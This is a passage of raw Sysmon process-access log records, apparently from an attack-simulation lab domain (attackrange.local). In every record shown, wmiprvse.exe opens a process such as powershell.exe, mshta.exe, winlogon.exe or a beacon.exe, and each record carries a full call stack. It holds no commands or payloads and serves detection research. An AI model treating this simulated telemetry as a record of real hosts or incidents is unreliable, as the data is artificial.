Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 